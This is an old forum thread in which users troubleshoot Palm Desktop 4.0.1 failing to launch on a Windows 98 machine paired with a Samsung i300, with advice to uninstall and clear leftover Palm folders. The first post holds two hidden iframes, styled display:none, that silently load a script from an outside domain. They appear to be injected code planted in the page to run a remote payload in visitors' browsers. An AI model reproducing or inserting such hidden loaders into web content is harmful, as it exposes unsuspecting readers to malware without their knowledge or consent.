+ Reply to Thread
Results 1 to 4 of 4
  1. #1
    Registered User
    Join Date
    12-24-2001
    Posts
    179

    Contacted Palm - got *N*O* help at all!

    My problem is that I cannot get Palm Desktop 4.x to open - it generates "Cannot initialize the Rich Text support" - whatever that means.

    Emailed Palm tech support, and received this bit of silliness:

    "Please refer you questions to Samsung as they are the ones who support their product. Many third-party devices have been designed for the Palm Computing platform. Unfortunately, we are not able to support such a large number of third-party applications and devices. If you are having a problem please contact Samsung.
    Thank you,
    Palm VII Support Specialist"

    ...as though Palm Desktop and the Palm OS isn't theirs, and Samsung isn't paying a hefty licensing fee.

    So... I contacted Samsung and we'll see.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    The older I get, the better I was...

  2. #2
    Registered User
    Join Date
    12-24-2001
    Posts
    179

    UPDATE - frustrating situation with Palm Desktop 4.0.1

    PIII/W98SE
    Samsung i300, OS 3.5.2

    3.1.0 works, but I'd like to get the additional features/advantages of the newer version. Desktop 4.0.1 won't load - instead, it generates the above announcement but with no buttons or options.

    The problem has nothing to do with the Samsung palmphone - it arises just on opening 4.0.1 before the i300 is even plugged into the cradle. I've dumped every item, done a few restarts, but cannot find the conflict.

    Palm says "talk to Samsung," even though it's clearly a conflict between Palm software any my desktop computer. Samsung says "talk to Palm," because it's a Palm software problem.

    Can you get 4.0.1 to work on *your* installation? Is it possible that Samsung's version of 3.1 is i300-specific, and leaves something behind that 4.0.1 doesn't like?
    The older I get, the better I was...

  3. #3
    chk
    chk is offline
    Registered User
    Join Date
    12-21-2001
    Posts
    18
    I'm using Palm Desktop 4.1 with no problems....I think lots of folks are successfully using it with the I-300.
    After you uninstall 3.1, delete the Palm folder (and the contents) that is created during the install. I had lots of trouble initially due to remnants of an old Palm Desktop install left over from my Palm 5x.
    I'm also using Desktop to Go which blows Pocket Mirror out of the water.

    Good luck!

  4. #4
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048

    Arrow

    i have been using the palm 4.0.1 since april with the 6035 and know the i300 and i have not ever seen that before.. i would just uninstall it and re dlwnload it from the palm website again to see if it does this... uninstall 3.1 if you had it installed...

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts